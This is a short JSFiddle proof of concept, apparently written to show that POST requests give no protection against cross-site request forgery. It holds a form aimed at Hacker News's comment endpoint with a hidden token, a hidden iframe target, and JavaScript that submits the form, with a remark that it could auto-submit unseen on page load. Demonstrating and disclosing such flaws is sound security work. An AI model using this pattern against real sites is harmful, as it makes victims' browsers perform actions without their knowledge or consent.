JSFiddle - React, Tailwind, and code Playground

HTML

<form id="form" target="frame" method="post" action="https://news.ycombinator.com/r">
    <input type=hidden name="fnid" value="XTNwn3voB9">
    <textarea name="text" rows=6 cols=60>
`<form>`s are allowed to send POST requests to wherever they want, without any restrictions. By creating a form that points to another domain, and automatically submitting it, you can send a POST request to wherever you want [1].

POST requests can be easily sent cross-domain. NO ONE SHOULD EVER think that just because he's not using GET requests he's safe from CSRF attacks.

[1] See http://jsfiddle.net/8xnB3/5/ for example (which sent this comment).
</textarea>
</form>
 
<iframe id="frame"></iframe>

<button id="submit">Submit</button>

CSS

iframe { display:none; }

JavaScript

$('#submit').click(function(){
    // Could as easily bind to document ready event and automatically
    // submit it. Its sent to an invisible frame, so the user won't
    // see a thing.
    $('#form').submit()
})